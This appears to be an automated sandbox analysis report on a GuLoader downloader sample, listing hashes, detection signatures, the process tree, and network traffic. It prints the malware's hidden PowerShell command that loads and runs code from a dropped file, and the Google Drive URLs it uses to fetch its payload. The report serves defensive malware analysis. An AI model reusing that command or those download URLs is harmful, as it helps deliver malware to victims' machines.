Edit tour

Windows Analysis Report
vq6jxdGvD6.exe

Overview

General Information

Sample name:	vq6jxdGvD6.exe renamed because original name is a hash value
Original sample name:	f413458062741d65426d5191e98205f507572baef3d31c94c550a66fb888a6ba.exe
Analysis ID:	1587612
MD5:	05f87e600088108eec219530590649bd
SHA1:	c47b8ad894bffcf29539ab9f9ff1d578804ba0be
SHA256:	f413458062741d65426d5191e98205f507572baef3d31c94c550a66fb888a6ba
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

vq6jxdGvD6.exe (PID: 1336 cmdline: "C:\Users\user\Desktop\vq6jxdGvD6.exe" MD5: 05F87E600088108EEC219530590649BD)

powershell.exe (PID: 2220 cmdline: "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 3608 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3383420098.00000000075C0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3608, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 57058

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2220, TargetFilename: C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)", CommandLine: "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vq6jxdGvD6.exe", ParentImage: C:\Users\user\Desktop\vq6jxdGvD6.exe, ParentProcessId: 1336, ParentProcessName: vq6jxdGvD6.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)", ProcessId: 2220, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:45:07.491739+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	57058	142.250.184.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vq6jxdGvD6.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

Avira: detection malicious, Label: TR/Injector.rcalv

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe

ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: vq6jxdGvD6.exe	Virustotal: Detection: 64%			Perma Link
Source: vq6jxdGvD6.exe	ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: vq6jxdGvD6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57070 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:57082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:57099 version: TLS 1.2

Source: vq6jxdGvD6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.6:56991 -> 162.159.36.2:53

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:57058 -> 142.250.184.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
